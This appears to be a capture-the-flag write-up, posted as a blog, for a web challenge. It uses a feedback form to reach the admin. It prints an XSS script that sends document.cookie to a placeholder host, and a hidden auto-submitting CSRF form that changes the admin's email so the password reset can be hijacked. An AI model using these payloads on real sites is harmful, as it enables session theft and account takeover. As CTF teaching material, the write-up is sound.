http://challenges.wargame.vn:1337/web100_f977a5eaea38b2dcd992c112bdb84b9a/
Hint:
Hint 1: Real-world exploit ;) it's easy , it's not about SQLi ..
Hint 2: We will check your feedback! Please wait few minutes :)
After opening the link, we face the login page:
There are 3 button namely login, register and Forgot? with hint1, we dont need to waste time on sql injection. let's register first and login to see what is inside. One notice is that username admin has already been taken.
Since there is no SQLi, we need to focus on feedback. What I think firstly is XSS and CSRF. Let's try XSS first by sending malicious script.
< script >There is only phpsessid=xxxxxxxxxxxx in my private log in http://xxxxx.com. It means that this site suffers from xss and it does not sanitize a feedback input. Now change our cookie to that admin's cookie :)). "Hacker detected" =))
function feedback()
{
var url = "http://xxxx.com/?id=" + document.cookie;
window.location.assign(url);
}
//feedback();
< /script>
Turning to CSRF exploit, think about what we can do to gain administrator privilege? Remember we have Forgot function in login page. So we can get admin's password by asking admin to change his/her email address to ours :)
Send him our script
<div id="hidden_form_container" style="display: none;"> < /div>
<script>
var theForm, newInput1, newInput2;
theForm = document.createElement('form');
theForm.action = '?act=change';
theForm.method = 'post';
newInput1 = document.createElement('input');
newInput1.type = 'hidden';
newInput1.name = 'email';
newInput1.value = 'email@address.com';
newInput2 = document.createElement('input');
newInput2.type = 'hidden';
newInput2.name = 'confirm';
newInput2.value = 'Change Email';
theForm.appendChild(newInput1);
theForm.appendChild(newInput2);
document.getElementById('hidden_form_container').appendChild(theForm);
theForm.submit();
</script>
Logging out, input our email address and use forgot function. After few minutes, check our email and we get the flag.
No comments:
Post a Comment